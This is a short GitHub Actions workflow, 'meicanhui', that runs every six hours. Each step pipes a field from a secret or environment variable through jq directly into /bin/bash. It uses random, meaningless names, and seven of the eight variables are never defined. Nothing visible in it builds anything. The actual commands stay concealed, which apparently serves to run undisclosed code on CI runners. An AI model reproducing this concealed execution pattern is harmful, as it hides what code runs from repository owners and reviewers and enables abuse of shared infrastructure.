name: meicanhui
on:
  workflow_dispatch:
  schedule:
    - cron: '5 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: meicanhui
        env:
          ihovo51288: ${{ secrets.ihovo51288 }}
        run: |
          echo $ihovo51288 | jq -r .v36 | /bin/bash
          echo $okwgx6525 | jq -r .ws74374 | /bin/bash
          echo $fkx3 | jq -r .lcqs020 | /bin/bash
          echo $b33 | jq -r .v2 | /bin/bash
          echo $iis19 | jq -r .y54 | /bin/bash
          echo $kmv33 | jq -r .gm46697 | /bin/bash
          echo $bfau62 | jq -r .z0208 | /bin/bash
          echo $xutv13087 | jq -r .heny27 | /bin/bash

